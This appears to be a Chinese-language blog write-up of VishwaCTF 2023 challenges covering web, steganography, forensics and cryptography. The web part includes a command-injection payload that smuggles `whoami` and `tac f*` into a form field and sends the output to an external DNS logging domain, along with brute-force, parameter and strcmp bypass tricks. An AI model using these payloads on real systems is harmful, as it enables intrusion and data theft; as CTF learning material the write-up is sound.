VishwaCTF 2023 Writeup

2023年04月03日技术约 2.5k 字大概 13 分钟

写在前面

怎么说呢… 感觉这比赛有些许神经质…套路确实不同于以前打的CTF

Web

spooky

I forgot my login credentials again!!

目录扫描发现存在 /sitemap.xml 文件，访问后给出了用户名列表和密码列表

<?xml version="1.0" encoding="UTF-8"?>
<urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
<url>
	<loc>/creds/users.txt</loc>
	<lastmod>2023-03-29T09:12:48+01:00</lastmod>
	<priority>1.0</priority>
</url>
<url>
	<loc>/creds/pass.txt</loc>
	<lastmod>2023-03-29T09:12:48+01:00</lastmod>
	<priority>1.0</priority>
</url>
</urlset>

直接使用 Burp 爆破得到正确的账号密码

1 2	`user=shrekop pass=VmU5gnXKYN2vLp48`

这题比较神经质，一开始以为爆出来正确的账号密码就行了，后来才发现貌似需要想办法提升到管理员用户，想了很久最后在登录的时候添加 &admin=true 得到 flag

Mascot

Very gracious host!!

目录扫描发发现存在 .git 泄露，使用 GitHack 进行利用发现脱不下来，但是返回的文件名内有个 FLAGGGGG.md 直接访问得到 flag

aLive

In my college level project I created this website that tells us if any domain/ip is active or not. But there is a catch.

通过 Dnslog 进行测试发现可以 RCE，可能是国外比赛的问题，使用国内Dnslog平台无法接收到数据

POST / HTTP/2
Host: ch431021116114.ch.eng.run
Content-Length: 37
Cache-Control: max-age=0
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
Origin: https://ch431021116114.ch.eng.run
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://ch431021116114.ch.eng.run/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

domain=`whoami`.a23b2268.ipv6.1433.eu.org

经过测试发现过滤了 cat ，我们直接 tac 绕过得到 flag

1	domain=`tac f*`.a23b2268.ipv6.1433.eu.org

Eeezzy

I forgot my login details again!

查看网页源代码发现有个 view.php

<?php

    session_start();
    $_SESSION['status']=null;

    $flag="";
    try {
        if (isset($_GET['username']) && isset($_GET['password'])) {
            if (strcmp($_GET['username'], $flag)==0 && strcmp($_GET['password'], $flag)==0)
                $_SESSION['status']=$flag;
            else
                $_SESSION['status']="Invalid username or password";
        }
    } catch (Throwable $th) {
        $_SESSION['status']=$flag;
    }

?>

直接数组绕过，注意一点，不能 username 和 password 均为数组，否则结果不为 true 会进入 else 语句

1	`?username=admin&password[]=`

Payload

访问 robots.txt 提到了 cmd 和 btn

<?php
    if(isset($_GET['cmd'])){
        system($_GET['cmd']);
    }
    else {
        if(isset($_GET['btn'])){
            echo "<b>System Details: </b>";
            system("uname -a");
        }
    }
?>

当点击页面上的系统详细信息按钮时，在 url 中出现 /?btn=，直接 btn 改为 cmd 命令执行即可，注意和前面一样貌似过滤了 cat 直接 tac 命令即可。

Steganography

Can you see me?

A magician made the seven wonders disappear. But people claim they can still feel their presence in the air.

下载附件得到一张图片，在文件尾发现存在隐藏文件，直接使用 foremost 分离得到一个 wav 音频文件，听起来像噪音…直接尝试使用 Audacity 显示为频谱图得到 flag

1	`vishwaCTF{n0w_y0u_533_m3}`

Guatemala

My friend wanted to install an antivirus for his computer, but the creator of the antivirus was caught!

下载附件发现无后缀，观察文件头发现是 GIF，改后缀后未发现特别信息，通过 exiftool 发现一段 Base64 编码

> .\exiftool.exe D:\Downloads\Guatemala\AV
ExifTool Version Number         : 12.22
File Name                       : AV.gif
Directory                       : D:/Downloads/Guatemala
File Size                       : 1086 KiB
File Modification Date/Time     : 2023:04:02 14:56:24+08:00
File Access Date/Time           : 2023:04:03 10:39:47+08:00
File Creation Date/Time         : 2023:04:02 14:55:58+08:00
File Permissions                : -rw-rw-rw-
File Type                       : GIF
File Type Extension             : gif
MIME Type                       : image/gif
GIF Version                     : 89a
Image Width                     : 498
Image Height                    : 498
Has Color Map                   : Yes
Color Resolution Depth          : 8
Bits Per Pixel                  : 8
Background Color                : 0
Animation Iterations            : Infinite
Comment                         : dmlzaHdhQ1RGe3ByMDczYzdfdXJfM1gxRn0=
Frame Count                     : 17
Duration                        : 2.04 s
Image Size                      : 498x498
Megapixels                      : 0.248

解码 Comment 后得到 flag

1	`vishwaCTF{pr073c7_ur_3X1F}`

Just Files

They are not what you see. They are different. Believe me.

下载附件后得到两张图片，分别是 Get_It_1.jpeg 和 Get_It_2.png，其中 Get_It_2.png 很大，直接使用 foremost 分离得到 Its_a_Morse_not_a_joke_take_it_seriously.wav 文件，前面很清楚是摩斯电码，后面很嘈杂听不懂，尝试识别莫斯电码后得到如下文本

1	`Reverse the audio and you should find name of protagonist. I told you the story in PNG file.`

根据描述我们使用 PR 进行倒放音频，貌似是一个剧中的原声，不过本人英语听力不行… 使用在线音频转文本工具得到如下信息(用于没充会员可能不完整)，搜索发现对话片段来自路西法(2016)

She humiliated me. She oh me you're not god's Jimmy. You didn't make her you a destroyer so I'm gonna punish you if that got you freak. I mean I am not going to jail for that bitch. No chance listen into a lucifer back off told you its fine. I'm a move tool.
Why did you do that? He was gonna kill you. No, no, no, no you just. You just let him off too easy and needs the pain he needs to suffer he to feel the pain, not escape it.
Don't worry, I'm sure he's going the pain coming. No, it's not, actually.
The.

所以说主角的名字是 lucifer 但是提交不正确，尝试 Steghide 解密 Its_a_Morse_not_a_joke_take_it_seriously.wav

┌──(kali㉿kali)-[~/Desktop/_Get_It_2.png.extracted]
└─$ steghide extract -sf Its_a_Morse_not_a_joke_take_it_seriously.wav 
Enter passphrase: 
wrote extracted data to "flag.txt".

打开 flag.txt 得到 flag

Nice 
The flag is {the name of protagonist_S01E03}.

name of protagonist should be in small case.

I Love You

There is an audio file given below… It is not so difficult but you will find it’s sound very deep

根据题目描述使用 DeepSound 得到 welcome.exe

根据图标发现 welcome.exe 很明显是 python 打包的文件，直接使用 pyinstxtractor 进行反编译

1	`python pyinstxtractor.py .\welcome.exe`

然后再通过在线工具反编译 pyc 文件得到源代码和 flag

print('Hey Cyber Warrior!!!')
print('I hope you have enjoyed whole journey..')
print('You know me .. Who I am ....')
print('ONLY CAPITAL CASES ARE ALLOWED AND _ BETWEEN TWO WORD')
for i in range(0, 4):
    key = input('Enter my last message for my daughter ---->')
    ans = 'I_LOVE_YOU_3000'
    if ans == key:
        print('Nice !!!!. You have got me.')
        print("Flag format ---> vishwaCTF{My Bestfriend's Name_First Apperance year}")
        c = input('Bye....meet you in 2023')
        break
        continue
    print("Wrong !!! you don't know me..")

Forensics

The Sender Conundrum

Marcus Got a Mysterious mail promising a flag if he could crack the password to the file.

得到一个加密压缩包 unzipme.zip 和 TheEmail.eml，直接使用记事本打开邮件原文 TheEmail.eml 得到关键信息

1
2
3

Hello this is u but from future

I am a noun and not a verb or an adverb. I am given to you at birth and never taken away, You keep me until you die, come what may. What am I?

问了一下 ChatGPT 他说答案是 Name，但是尝试了一下密码不对，直接尝试爆破，尝试了很多字典，最后通过 rockyou.txt 爆破出了正确密码 BrandonLee

解压后得到 flag

1	`vishwaCTF{1d3n7i7y_7h3f7_is_n0t_4_j0k3}`

1nj3ct0r

You Are Working As Digital Forensics Expert At Infosys India And Someone Reported That A PC Might Have Been Infected. Tech Team Already Collected All The Evidences From Workstation And Found That Someone Injected Malicious Code. It Is Your Job To Find, what Is Injected Into That PC.
NOTE:Use Underscore(_) After Every Word.

wireshark 打开附件发现是 USB 流量，我们通过 tshark 导出所有长度为 2 和内容不为空的流量

1	`./tshark.exe -r usbforensics.pcapng -2 -R "usb.data_len==2 && usb.capdata!=0000" -T fields -e usb.capdata >usbdata.txt`

得到所有的按键流量

00:09
00:0f
00:04
00:0a
20:33
20:2f
00:11
00:27
00:1a
20:2d
00:1c
00:27
00:18
20:2d
00:21
00:1f
00:20
20:2d
00:07
00:27
00:11
00:20
20:2d
00:1a
00:1e
00:24
00:0b
20:2d
00:18
00:22
00:25
20:2d
00:09
00:27
00:1f
00:20
00:11
00:22
00:1e
00:06
00:22
20:30

直接脚本解密得到 flag

normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"}

usb_data = open('usbdata.txt')

for line in usb_data:
    key = line.split(":")[1]
    key = key.strip()
    if key in normalKeys:
        print(normalKeys[key], end="")
# flag;[n0w-y0u-423-d0n3-w17h-u58-f023n51c5]

Cryptography

The Indecipherable Cipher

Our crypto specialist Mr.Kasiski is currently unavailable, so help us decode this string.
String: j3qrh4kgz3iptmyqxcw0zkm8i5xugs5lwl0lrwvirwktlqinexcw0zkmq5nqvpebpor5wqipqhw2ikzm4ipktzlr

一开始用 cyberchef 没出来，接着用 cipher-identifier 猜测以下什么编码

试了一下 Base32 未果，尝试 维吉尼亚密码 发现可行，因为密文中存在数字，所以密码表需要手动加上 0-9

1	`VishwaCTF{friedrichwilhelmkasiskiwastheonewhodesignedtheaaakasiskiexaminationtodecodevignerecipher}`

文章分类

文章归档